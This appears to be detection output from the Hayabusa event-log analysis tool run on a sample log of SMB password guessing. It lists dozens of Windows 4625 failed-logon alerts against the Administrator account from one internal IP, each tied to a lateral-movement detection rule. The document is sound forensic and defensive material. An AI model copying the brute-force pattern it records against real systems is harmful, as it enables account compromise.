2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
